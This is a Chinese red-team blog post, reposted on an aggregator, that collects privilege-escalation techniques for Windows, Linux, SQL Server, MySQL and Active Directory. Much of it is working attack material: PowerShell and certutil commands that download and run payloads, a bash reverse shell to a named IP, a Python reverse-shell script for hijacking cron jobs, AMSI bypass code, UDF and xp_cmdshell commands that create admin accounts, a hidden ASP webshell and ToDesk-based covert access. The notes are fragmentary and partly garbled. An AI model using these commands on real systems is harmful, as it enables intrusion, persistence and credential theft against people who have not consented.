红队专题-Web渗透之权限提升总结

news2024/12/22 9:31:09

在这里插入图片描述

权限提升专题

  • 招募六边形战士队员
  • 提权介绍
  • 提权前提:
  • Linux提权
    • 内核漏洞提权-首选考虑
    • 明文root密码提权
    • 计划任务
    • 密码复用
  • 05 提权与内网渗透
    • 第三章 数据库提权
      • 第一节 SQL Server数据库漏洞利用与提权
      • 第二节 MySQL数据库漏洞与提权
        • mysql root权限下 提权
        • UDF 提权执行系统命令
          • - windows 提权前提
  • Mysql的用户在没有File权限情况-低权限拿到root密码
    • Windows Smb 重放 / 中继 利用
    • CTF-高难度内核提权
    • windows EXP提权
    • EXP溢出提权(不可以使用技巧/无障碍提权)
      • shell 连接
    • 处理下virualbox 与物理机联通问题
    • 创建环境
    • mysql5.1------Linux提权
  • #1 简单纵深打击
  • 第一章 初见提权
    • 第一节 提权概述
      • 基础命令
        • 查看用户登录情况 query user
        • 数据库提权
    • 第二节 基于密码破解的提权
      • 哈希获取破解
      • 局域网 arp 、 dns 劫持 嗅探
  • MSSQL

招募六边形战士队员

一起学习 代码审计、安全开发、web攻防、逆向等。。。
私信联系
在这里插入图片描述

 1.代理池
cdn端到端  域前置ssl

profile


ping命令确定目标出网情况
尝试执行powershell命令直接上线cs
powershell.exe IEX ((new-object net.webclient).downloadstring('http://x.x.x.x/x'))

使用证书下载尝试下载木马到服务器执行
certutil.exe -urlcache -split -f http://x.x.x.x/x.exe  D:\x.exe


iis的命令执行权限
利用烂土豆插件成功提权至system权限

Powershell.exe  -w   Normal  -w   Normal  -w   Normal  -w   Normal  -w   Normal  -w   Normal  -w   Normal  -w   Normal  -w   Normal  -w   Normal  -w   Normal  -w   Normal  -w   Normal -w   Normal  -w   Normal  -w   Normal  -w   Normal  -w   Normal  -w   Normal  -w   Normal  -w   Normal  -w   Normal  -w   Normal  - w   Normal  -w   Normal  -w   Normal  -w   Normal  -w   Normal  -w   Normal  -w   Normal  -w   Normal  -w   Normal  -w   Normal  -w   Normal  -w  Normal  -w   Normal  -w   Normal  -w   Normal  -w   Normal  -w   No rmal  -w   Normal  -w   Normal  -w   Normal  -w   Normal  -w   Normal  -w   Normal  -w   Normal  -w   Normal  -w   Normal  -w   Normal   set-alias -name key -value IEX; key(New-Object Net.WebClient).DownloadString('h‘+’ttp://x.x.x.x/a')

taowu->权限提升->juicypotato
nt authority\system

server2012服务器 无法读取明文密码 
激活guest用户

net user guest   /active:yes
net user guest   tide@123456
net localgroup   administrators  guest   /add

搭建socks5隧道(nps,frp)


https://mp.weixin.qq.com/s/ph09jS2P883_4K49AYEEOg


ms14-058  CVE-2014-4113   驱动漏洞远程代码执行提权
server 2008
该漏洞影响了所有的Windows版本,
包括Windows7 和 Windows Server 2008 R2 及以下版本。
造成该漏洞原因是当 Windows 内核模式驱动程序 (win32k.sys) 不正确地处理内存中的对象时,会导致该漏洞。


msf CVE-2020-0787
Windows全版本本地提权漏洞





MS16-075烂土豆提权
execute-assembly CobaltStrike从内存加载.NET程序集



nt authority\system

将System权限上线到CobaltStrike
阿里云的ECS,对出站端口进行了限制,所以反弹不回来

https://mp.weixin.qq.com/s/_yL8htI1yqOJroev3eC_2A

创建一个管理员账户,然后3389远程桌面连接

利用Procdump+mimikatz获取到Administrator账户的明文密码。
(因为是win2008的服务器,所以可以获取到明文密码,08之后的服务器获取到的就是密文的了)







横向端口135,139,445


单点登录  中央认证系统



Procdump+mimikatz配合抓取密码Procdump是微软官方工具,不会被杀软查杀,
其抓取密码的原理是获取内存文件 lsass.exe 进程 (它用于本地安全和登陆策略) 中存储的明文登录密码并存储到lsass.dmp文件中,
之后我们就可以使用mimikatz去读取lsass.dmp获取到明文密码。


win10或2012R2以上操作要麻烦一些


远程桌面时,为了能够将我们本地的程序或文件拷贝到远程的主机上,应在本地资源中勾选上驱动器



读写目录的探测Read_and_Write
虚拟主机,磁盘权限设置较为严格,cmd.exe被降权执行不了命令,常见可读写目录也不能读,
这时就需要用到探测可读写的脚本来查找可读写的目录和文件,用于上传cmd.exe和提权EXP等。

可读写的系统文件上传覆盖执行
VHAdmin虚拟主机提权实战案例https://mp.weixin.qq.com/s/LmXi6niSJ4s-Cmq3jWSjaQ


常见可读写目录

扫描可读写目录

C:\Users\
C:\Windows\
C:\ProgramData\
C:\Program Files\
C:\Program Files (x86)\
C:\Documents and Settings\


≤2003可读写目录

C:\RECYCLER\
D:\RECYCLER\
E:\RECYCLER\
C:\Windows\temp\
C:\Windows\Debug\
C:\Windows\Registration\CRMLog\
C:\Documents and Settings\All Users\Documents\


≥2008可读写目录

C:\ProgramData\
C:\Windows\temp\
C:\Windows\Tasks\
C:\Windows\tracing\    //不可删
C:\Windows\debug\WIA\
C:\Windows\servicing\Sessions\
C:\Windows\servicing\Packages\
C:\Windows\Registration\CRMLog\
C:\Windows\System32\spool\drivers\color\
C:\Users\Default\AppData\    //不可删
C:\ProgramData\Microsoft\DeviceSync\
C:\ProgramData\Microsoft\Crypto\DSS\MachineKeys\
C:\ProgramData\Microsoft\Crypto\RSA\MachineKeys\
C:\ProgramData\Microsoft\User Account Pictures\    //不可删
C:\Users\All Users\Microsoft\NetFramework\BreadcrumbStore\    //不可删
C:\ProgramData\Microsoft\Windows\WER\ReportArchive\
C:\Windows\System32\Microsoft\Crypto\RSA\MachineKeys\
C:\Windows\syswow64\tasks\microsoft\Windows\pla\system\
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Temporary ASP.NET Files\
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Temporary ASP.NET Files\
C:\Windows\System32\catroot2\{127D0A1D-4EF2-11D1-8608-00C04FC295EE}\
C:\Windows\System32\catroot2\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\



开启了disable_function,disable_functions是php.ini中的一个设置选项,
可以用来设置PHP环境禁止使用某些函数

用来禁用某些危险的命令执行函数等。
(eval并非PHP函数,放在disable_functions中是无法禁用的,若要禁用需要用到PHP的扩展Suhosin。)

passthru,exec,system,putenv,chroot,chgrp,chown,shell_exec,popen,proc_open,pcntl_exec,ini_alter,ini_restore,dl,openlog,syslog,readlink,symlink,popepassthru,pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,imap_open,apache_setenv

项目地址:https://github.com/mm0r1/exploits

直接绕过了可以执行命令

bash反弹

bash+-i+>%26+/dev/tcp/112.74.50.219/7777+0>%261

在frp反向代理到meterpreter

查看内核
msf自带的提权并没有成功直接使用CVE-2021-4034 Polkit Pkexec本地提权
https://github.com/berdav/CVE-2021-4034
上传编译直接运行
一开始没有成功仔细看了下有个tmp目录已经存在
直接删除
运行返回root权限。





启动guest三件套:

激活Guest用户
net user guest /active:yes修改Guest的密码
net user guest Guest@123将Guest加入管理员组
net localgroup administrators guest /add

会话传递

CobaltStrike与Metasploit之间的会话传递


https://mp.weixin.qq.com/s/_yL8htI1yqOJroev3eC_2A   记首次HW|某地级市攻防演练红队渗透总结

 穿透中转负载均衡上线

域前置 cdn
profile
端到端ssl证书





内核提权




SUDO提权
得到登陆凭证
https://gtfobins.github.io/  


sudo -l
sudo find . -exec /bin/sh \; -quit




KeyTabExtract 提取内容  提取主机凭证NTLM
python3 keytabextract.py krb5.keytab
得到AES 哈希HASH




域上下文   枚举 收集域信息
bloodhound-python3 -c ALL -u 'WEB01$DBLACKOPS.LOCAL' --hashes 00000000000000000000000000000000:NTLM HASH -d BLACKOPS.LOCAL -ns ip --dns-tcp   内网有用
socket5 只允许tcp访问


connect LDAP 获取server信息
域  森林

Active directory user and  computer 


BloodHound 是一个强大的内网域渗透提权分析工具
搜索域用户 - 本地用户  共用密码
 
 
 SUID 提权    枚举 
 find / -type f -pern /4000 2>/dev/null
 
 多个二进制文件设置了 SUID
 /usr/bin/cat
 /usr/bin/wget
 tcpdump 提权
 
 cd /home
 ls -al  查看成员
 
 通过find提权
 find . -exec /bin/sh -p \; -quit
 
 查找helen  登录ftp的域用户
 
 
 tcpdump嗅探  明文
 tcpdump -i ens33 dst post
 嗅探ftp  21端口 流量中的 密码  Summer2022!
 
 
 xfreerdp /u:helen.park  /p:Summer2022! /d:blackops.local /cert:ignore /v:ip  /dynanic-resolution
 
 所在群组  访问什么主机
 
 outbount control rights
 其他用户的特权  修改密码
 
 SPN 是服务在使用 Kerberos 身份验证的网络上的唯一标识符,它由服务类、主机名和端口组成。 
 授予SPN变成服务账号
 
 
 组策略
 
 ACL一般指访问控制列表。 
 访问控制列表(ACL)是一种基于包过滤的访问控制技术,它可以根据设定的条件对接口上的数据包进行过滤,允许其通过或丢弃。
 
 
 
 创建会话
 runas /netonly  /user:blackops\russell.adler  powershell  
 password 
 
 
 C:\Windows\Tasks
 
 'amsiutils'
 .net AMSI绕过
 $a = [Ref].Assembly.GetTypes();ForEach($b in $a) {if ($b.Name -like "*iutils") {$c = $b}};$d = $c.GetFields('NonPublic,Static');ForEach($e in $d) {if ($e.Name -like "*itFailed") {$f = $e}};$f.SetValue($null,$true)
 
 

导入powerview
iex(new-object net.webclient).downloadstring('http://ip/Invoke-PowerShellTcp.ps1');
powerview.ps1


ForceChangePassword 权限

Set-DomainUserPassword -Identity frank.woods -AccountPassword (ConvertTo-SecureString 'Passw0rd' -AsPlainTest -Force) -Verbose



GenericWrite 权限
用新改的 创建会话
一句话绕过
导入powerview.ps1
设置SPN
Set-DomainObject -Identity ir_operator -set @{serviceprincipalname='fake/client01'}

对其 Kerberoasting

导入
iex(new-object net.webclient).downloadstring('http://ip/adpeas.ps1');
动静大 不建议使用
invoke-adpeas

已经有了  hashcat的格式  得到凭证

hashcat -a 0 -m 13100 hash.txt dict/rockyou.txt


密码重用  创建会话
绕过AMSI
加载powermad.ps1
创建新的主机账号
New-MachineAccount -MachineAccount rbcd -Password $(ConvertTo-secureString '123' -AsPlainText -Force)
[+] Machine account rbcd added


GenericWrite 权限  可以利用 RBCD
下载 rubeus 到内存  调用
计算主机 
NTLM是NT LAN Manager的缩写,这也说明了协议的来源。
NTLM 是指 telnet 的一种验证身份方式,即问询/应答身份验证协议,是 Windows NT 早期版本的标准安全协议,
Windows 2000 支持 NTLM 是为了保持向后兼容。Windows 2000内置三种基本安全协议之一。

Microsoft.ActiveDirectory.Management.dll   使服务器信任我们创建的主机
iwr http://ip:port/ad.dll -o ad.dll
ipmo .\ad.dll

Set-ADComputer srv01 -PrincipalsAllowedToDelegateToAccount rbcd$ -Server ip -Verbose
VERBOSE:

加载powerview.ps1
内存执行
查看
get-netcomputer -identity srv01

msds-allowedtoactonbehalfofotheridentity
信任主机账号  rbcd$
对HASH有控制权
滥用

$data=(New-Object System.Net.Webclient).DownloadData('http:ip:port/rubeus.exe')
下载到内存
载入内存
$assem = [System.Reflection.Assembly]::Load($data)


$ZQCUW = @"
using System;
using System.Runtime.InteropServices;

public class ZQCUW {
 	[DllImport("kernel32")]
    public static extern IntPtr GetProAddress(IntPtr hModule, string proName);
    [DllImport("kernel32")]
    public static extern IntPtr LoadLibrary(string name);
    [DllImport("kernel32")]
    public static extern bool VirtualProtect(IntPtr lpAddress,UIntPtr dwSize,uint flNewProtest);
}
"@

Add-Type $ZQCUW
[IntPtr]$hModule = [Kernel32]::LoadLibrary("amsi.dll")
Write-Host "[+] AMSI DLL Handle: $hModule"


https://www.bilibili.com/video/BV1qf4y1f7xB?spm_id_from=333.337.search-card.all.click&vd_source=f21773b7086456ae21a58a6cc59023be
 权限维持稳固

 
 管理  密码 hash
 32/64

收集 服务配置密码
mysql
mssql
tomcat

管理员 行为 记录

浏览器
mstsc
管理行为记录 


web后门 隐藏

将shell写入图片  include包含
隐藏在jpg图片EXif中的后门
创建隐藏的文件夹 写入shell

 C:\Intelpub\wwwroot>md  C:\Intelpub\wwwroot\a..\
 C:\Intelpub\wwwroot>echo "<%execute(request("1"))%>" >\\.\ C:\Intelpub\wwwroot\a..\aux.asp
 
 shell 地址: http://ip/a./aux.asp
 
win2003  webshell权限
aspx脚本无效


Easy File locker 驱动 隐藏文件
win2003 
 提权

windows
EXP 溢出  
能否执行命令
32  64  exp 收集


Linux

exp
- 无法反弹  如何提权

jsp容器
可能root

mysql
root
cat  /etc/password

ps aux |grep root
进程 溢出  
 探测其他脚本

 php 是否 system权限
 
 jspshell  看权限是否 system
 mysql 提权

root提权
udf提权
MOF提权
 mssql提权

- sa权限 xp_cmdshell

- db_owner提权
在db_owner所在管理 表中
创建触发器
等管理员 用sa 去执行 插入表命令  触发提权
 oracle提权

- DBA权限  
利用java 访问系统文件、执行命令

- 低权限
获取os访问权限
 域内本地凭证  关键文件收集 

 星外提权
pcanywhere提权

servu提权
windows 远控

anydesk远控
远控软件–Todesk
https://www.todesk.com/download.html
支持静默安装
命令行参数调用
ToDesk_Setup.exe /S

ToDesk.exe -setpassword password
设置安全密码
@echo off
for /f "delims=" %%i in ('"E:\ToDesk\ToDesk.exe" -status') do echo %%i
pause

windows2012R2
administrator

C:/inetpub>
C:\Program Files (x86)\ToDesk


不出意外的话会设置好安全密码以及输出连接的识别码


目标机器已安装了todesk

这种意外情况对于我们来说就挺,应该是那种想到了开心的事的感觉。其实在这里要说的是另一种方法获取识别码以及连接密码,我们只需要找到todesk的根目录即可,然后查看config.ini,在cinfig.ini可以找到识别码以及加密的密码。

对于加密的密码我们可以复制到本地的todesk配置文件里,替换我们本地的密码,然后重新打开todesk,这样就能得倒对方机器的连接密码。


直接kill todesk进程(一定要杀ToDesk_Service.exe)然后给目标机器修改config文件,替换成我们设置的密码

需要管理员权限,目标机器锁屏需要密码,体积太大,容易被发现等问题
 Bash解析  破壳漏洞 
C:\Users\amingMM\Desktop\xxx.elf


提权介绍

往往 拿下服务器的web服务只是具有低权限用户(www-data)
对于内网渗透,我们需要提权到root
提升权限是非常关键的一步,
攻击者往往可以通过利用内核漏洞/权限配置不当/root权限运行的服务等方式寻找突破点,
来达到提升权限的目的。

linux系统的提权过程不止涉及到了漏洞,也涉及了很多系统配置。

提权前提:

  • 已经拿到低权shell
  • 被入侵的机器上面有nc,python,perl等非常常见的工具
  • 有权限上传文件和下载文件

Linux提权

内核漏洞提权-首选考虑

先查看是否可以使用内核漏洞进行提权。先对系统做个了解

 #查看发行版本
cat /etc/issue
cat /etc/*-release
# 查看内核版本
uname -a


# 查看系统发行版本  Ubuntu 
lsb_release -a 

寻找内核溢出代码使用searchsploit
在这里插入图片描述

 gcc xxx.c -o exploit
chmod +x exploit
./exploit 
 

内核溢出的提权,不过一般用不上。

明文root密码提权

大多linux系统的密码都和/etc/passwd、/etc/shadow这两个配置文件相关的;
passwd里面储存了用户,
shadow里面是密码的hash;
且passwd是全用户可读,root可写。
shadow是仅root可以进行读写的。
破解linux用户名和对应的密码

使用John这个工具来破解。
可以在root权限下查看密码(前提是不知道root密码)

计划任务

系统内可能会有一些定时执行的任务,
一般这些任务由crontab来管理,
具有所属用户的权限。

非root权限的用户是不可以列出root用户的计划任务的。
但是/etc/内系统的计划任务可以被列出
默认这些程序以root权限执行,
如果刚好遇到一个把其中脚本配置成可以任意用户可写的,
这个时候就可以修改脚本等回连rootshell;
如果定时执行的文件时python脚本,可以使用下面的脚本来替换之前的脚本。

#!/usr/bin/python
import os,subprocess,socket

s=socket.socekt(sicket.AF_INET,socket.SOCK_STREAM)
s.connect(("10.0.2.4","4444"))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"])

查看/etc/crontab 有无可写权限的文件
在这里插入图片描述

密码复用

linux要求用户必须从终端设备(tty)中输入密码,而不是标准输入,
也就是说sudo在输入密码的时候本质是读取键盘,而不是bash里面的字符。
因此要输入密码,还需要一个终端设备。python有这种功能的,就是模拟化终端,输入

python -c "import pty;pty.spawn('/bin/bash')"

在这里插入图片描述
看到是已经启动了虚拟终端
ssh 登录
ssh xxx@ip

利用zip进行提权
sudo -l查看了当前可以使用root提权的命令信息。

Matching Defaults entries for zico on this host:
    env_reset, exempt_group=admin,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User zico may run the following commands on this host:
    (root) NOPASSWD: /bin/tar
    (root) NOPASSWD: /usr/bin/zip
 

可以使用zip进行提权

touch exploit
sudo -u root zip exploit.zip exploit -T --unzip-command="sh -c /bin/bash"

在这里插入图片描述

05 提权与内网渗透

第三章 数据库提权

第一节 SQL Server数据库漏洞利用与提权

在这里插入图片描述在这里插入图片描述

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述在这里插入图片描述
dbo 权限 备份数据库 不可以 执行命令

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
SESHELL
mdb 注册表 操作 执行命令

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

第二节 MySQL数据库漏洞与提权

在这里插入图片描述
在这里插入图片描述

mysql root权限下 提权

安装问题
默认在 系统管理员 下 安装

以服务 启动

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
备份数据库 就 会有 文件

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

在这里插入图片描述
mof 定时 都可以 提权

在这里插入图片描述
在这里插入图片描述

远程 执行命令 反弹 shell 回来 *(攻击机 监听端口 )

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

UDF 提权执行系统命令

● Linux UDF
通过数据库来实现获取目标的管理员的shell,来达到从低权限提权到高权限

sleep(),sum(),ascii()

用户自定义函数
自己写方便自己函数,它有3种返回值,
分别是STRING字符型,INTEGER整型,REAL 实数型
  


-掌握mysql数据库的账户,从拥有对mysql的insert和delete权限,以创建和抛弃函数。拥有可以将udf.dll写入相应目录的权限

版本大于5.1的udf.dll放到mysql安装目录的libplugin文件夹才能创建自定义函数。目录默认是不存在的需要自己创建,在安装目录下创建libplugin文件夹,然后将udf.dll导出到这个目录。
- windows 提权前提

mysql版本大于5.1,
udf.dll文件必须放置在mysql安装目录的lib plugin文件夹下

mysql版本小于5.1,
udf.dll文件在 windows server 2003下放置于c:windows system32目录,
在windows server - - 2000下放置在c:winnt system32目录。

在这里插入图片描述

 首先、查看一下MySQL是32位的还是64位的,查看这个有几种方式:
mysql -V
mysql --version
进入MySQL数据库中,执行: 


show variables like '%datadir%';
-- C:\ProgramData\MySQL\MySQL Server 5.7\Data\


show variables like '%version_%';



在这里插入图片描述

在这里插入图片描述

 create function cmdshell returns string soname 'udf.dll' 
select cmdshell('net user iis_user 123!@#abcABC /add'); 
select cmdshell('net localgroup administrators iis_user /add'); 
select cmdshell('regedit /s d:web3389.reg'); 
drop function cmdshell; 
select cmdshell('netstat -an'); 

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

  • 要求 root 权限

  • mof 是 win系统自带 漏洞

Mysql的用户在没有File权限情况-低权限拿到root密码

Mysql漏洞利用(越权, 从低权限拿到root密码)

无法通过Load_file读文件
或者通过into dumpfile 或者into outfile去写文件

通过load data infile可以读取本地文件到数据库,这样子我们就可以在低权限下通过这个bug去读取服务器上的文件

读取mysql的数据库文件,mysql库的user表里存放着所有用户的hash

在这里插入图片描述

 LOAD DATA LOCAL INFILE 'C:/boot.ini' INTO TABLE test FIELDS TERMINATED BY '';  
 
LOAD DATA LOCAL INFILE 'C:/wamp/bin/mysql/mysql5.6.12/data/mysql/user.MYD' INTO TABLE test2 fields terminated by ''; 

select * from test2;

在这里插入图片描述

用winhex打开一下user.myd文件
在这里插入图片描述
被00字符给截断了,导致后面的东西都没进数据库。
下面就想办法绕过这个限制。
经过几次尝试发现,在后面加上LINES TERMINATED BY ‘’ 即可,这样子就把截断符号作为分隔符处理了,完整的语句

 
LOAD DATA LOCAL INFILE 'C:/wamp/bin/mysql/mysql5.6.12/data/mysql/user2.MYD' INTO TABLE test2 fields terminated by '' LINES TERMINATED BY ''; 

在这里插入图片描述

Windows Smb 重放 / 中继 利用

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述在这里插入图片描述
在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述
在这里插入图片描述
在这里插入图片描述在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

在这里插入图片描述

CTF-高难度内核提权

在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述
在这里插入图片描述在这里插入图片描述
在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述 在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述

windows EXP提权

EXP溢出提权(不可以使用技巧/无障碍提权)

exploit —>windows溢出利用

shell 连接

虚拟连接提权

  • 中国菜刀
  • 蚁剑
  • 大马shell 执行命令 dir

一句话木马提权


在这里插入图片描述在这里插入图片描述

处理下virualbox 与物理机联通问题

在这里插入图片描述

创建环境

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述


  1. 查看权限 whoami systeminfo (补丁)
  2. 提升权限 net user xxx xxx /add net localgroup
  3. 查看端口 tasklist /svc netstat -ano

在这里插入图片描述在这里插入图片描述在这里插入图片描述

  • 暂时将就 下吧 C盘文件
    在这里插入图片描述在这里插入图片描述
  • 查看补丁
    在这里插入图片描述
  • 补丁程序 暂缺
  • 为所欲为

在这里插入图片描述在这里插入图片描述
在这里插入图片描述

  • 无意间 发现了个 工具

mysql5.1------Linux提权

#1 简单纵深打击

在这里插入图片描述

通过资产扫描弱口令    FTP  Mysql   Redis   ssh   RPC 

在这里插入图片描述
在这里插入图片描述在这里插入图片描述

 由于 root 权限  免了低高权限 UDP 提权

i春秋\05 提权与内网渗透\

第一章 初见提权

第一节 提权概述

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

基础命令

查看用户登录情况 query user

在这里插入图片描述

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

脏牛漏洞

第三方软件 提权 - pr提权

数据库提权

sqlserver SA xp cmd shell

mysql udf 插件提权 确权MOF 替换文件 提权

dll文件 加载

ftp 输入法 vnc 配置

输入法 替换exe 重启 自动加载

  • webshell 是根据 中间件 安装时 的权限 所依据的

在这里插入图片描述

第二节 基于密码破解的提权

在这里插入图片描述
在这里插入图片描述

哈希获取破解

在这里插入图片描述
在这里插入图片描述

局域网 arp 、 dns 劫持 嗅探

MSSQL

 xp_cmdshell提权

xp_cmdshell是Sql Server中的一个组件,将命令字符串作为操作系统命令 shell 执行,并以文本行的形式返回所有输出。
xp_cmdshell默认在mssql2000中是开启的,在mssql2005之后默认禁止,但未删除

2005的xp_cmdshell的权限一般是system,
而2008多数为nt authority\network service。
故xp_cmdshell的提权前提为两个:(1)拿到sa权限的账户密码;(2)sqlserver服务未降权


只要该数据库存在该组件,就可以利用

查看xp_cmdshell状态

select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'


返回1表示xp_cmdshell组件启用

如果没有启用,则开启该组件,命令为:

EXEC sp_configure 'show advanced options', 1
RECONFIGURE
EXEC sp_configure 'xp_cmdshell',1
RECONFIGURE

同样,关闭组件命令为

EXEC sp_configure 'show advanced options', 1
RECONFIGURE
EXEC sp_configure 'xp_cmdshell',0
RECONFIGURE

执行系统命令如下(任意一条都可以)

exec xp_cmdshell "whoami"
master..xp_cmdshell 'whoami'    (2008版上好像用不了)
EXEC master..xp_cmdshell "whoami"
EXEC master.dbo.xp_cmdshell "ipconfig"     ------------------



已取得内部服务器sql server 的sa 权限

exec master..xp_cmdshell "net user test12 123.com /add"
exec master..xp_cmdshell "net localgroup administrators test12 /add"
exec master..xp_cmdshell "net user test12" 


https://blog.csdn.net/guo15890025019/article/details/119055233



只允许本地连接的SQL Server数据库提权

命令行连接工具osql和sqlcmd尝试去连

冰蝎的数据库管理模块能连上,但执行提权操作



蚁剑中也是能连上,执行提权操作时提示“ODBC 驱动程序不支持所需的属性错误”

上传大马提权
nt authority\network service


https://github.com/antonioCoco/JuicyPotatoNG

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1139442.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

Python-利用海龟库输出以下图形

利用海龟库输出以下图形 import turtle turtle.setup(650, 350,200, 200) a["white","yellow","magenta","cyan","blue","black","cyan"] turtle.penup() turtle.fd(-250) turtle.pendown() turtle.pen…

软件开发全文档整理(原件获取)

一、软件开发周期及各阶段文档的作用 软件开发周期通常包括需求分析、设计、编码、测试和维护等阶段。每个阶段都需要相应的文档来记录和说明。以下是各阶段文档的作用&#xff1a; **需求分析阶段&#xff1a;**需求分析文档是软件开发的基础&#xff0c;它描述了用户需求和…

Zynq UltraScale+ XCZU4EV 纯VHDL解码 IMX214 MIPI 视频,2路视频拼接输出,提供vivado工程源码和技术支持

目录 1、前言免责声明 2、我这里已有的 MIPI 编解码方案3、本 MIPI CSI2 模块性能及其优越性4、详细设计方案设计原理框图IMX214 摄像头及其配置D-PHY 模块CSI-2-RX 模块Bayer转RGB模块伽马矫正模块VDMA图像缓存Video Scaler 图像缓存DP 输出 5、vivado工程详解PL端FPGA硬件设计…

51单片机汽车胎压大气气压测量仪仿真设计_数码管显示(代码+仿真+设计报告+讲解)

51单片机汽车胎压大气气压测量仪仿真设计_数码管显示 (代码仿真设计报告讲解) 仿真原版本&#xff1a;proteus 7.8 程序编译器&#xff1a;keil 4/keil 5 编程语言&#xff1a;C语言 设计编号&#xff1a;S0018 目录 51单片机汽车胎压大气气压测量仪仿真设计_数码管显示功…

高效技巧揭秘:Java轻松批量插入或删除Excel行列操作

摘要&#xff1a;本文由葡萄城技术团队原创并首发。转载请注明出处&#xff1a;葡萄城官网&#xff0c;葡萄城为开发者提供专业的开发工具、解决方案和服务&#xff0c;赋能开发者。 前言 在职场生活中&#xff0c;对Excel工作表的行和列进行操作是非常普遍的需求。一般情况下…

普洛斯数据中心为某互联网头部平台打造的首个液冷智算数据中心正式交付运营

普洛斯数据中心近期向某互联网头部平台交付其首个液冷智算数据中心项目&#xff0c;该项目采用智能算力中心弹性高效节能技术方案&#xff0c;能够敏捷灵活应对高性能算力集群同时部署、分期上线、快速交付等多方面的挑战&#xff0c;并且高效耦合运维管理系统&#xff0c;切实…

报表组件DevExpress Reporting中文教程 - 如何直接在浏览器中生成报表?

DevExpress Reports组件被设计为一个跨平台的报表解决方案&#xff0c;您可以创建一次报表&#xff0c;然后将文档显示、打印和导出到任何受支持的.NET平台中&#xff0c;用户体验扩展到部署应用程序的所有托管环境/操作系统。 DevExpress Reporting是.NET Framework下功能完善…

ios 代码上下文截屏之后导致的图片异常问题

业务场景&#xff0c;之前是直接将当前的collectionview截长屏操作&#xff0c;第一次截图会出现黑色部分原因是视图未完全布局&#xff0c;原因是第一次使用了Masonry约束然后再截图的时候进行了frame赋值&#xff0c;可以查看下Masonry约束和frame的冲突&#xff0c;全部修改…

seaborn绘图(自用)

import seaborn as sns import matplotlib.pyplot as plt# set_theme设置主题 #sns.set_theme(style"whitegrid") #白色&#xff0b;刻度线&#xff0c;无坐标轴标度 #sns.set_theme(style"white") #白色无刻度线&#xff0c;无坐标轴标度 #sns.set_theme(…

DLedgerServer消息写入

下面以一个demo来理解消息DLedger消息写入和同步其他Peers的流程 /*** 创建DLedgerServer*/public DLedgerServer create(String selfId, String peers, String leaderId) {DLedgerConfig dLedgerConfig new DLedgerConfig();dLedgerConfig.setMappedFileSizeForEntryData(102…

Wt库的下载器程序

#include <stdio.h> #include <string.h> #include <stdlib.h> #include <microhttpd.h> // 设置服务器的地址和端口号 const char *proxy_host ""; const int proxy_port 8000; // 下载的文件路径 const char *filename "xiuxiu.…

电脑桌面文件不见了怎么恢复?4个方法!(详细步骤分享)

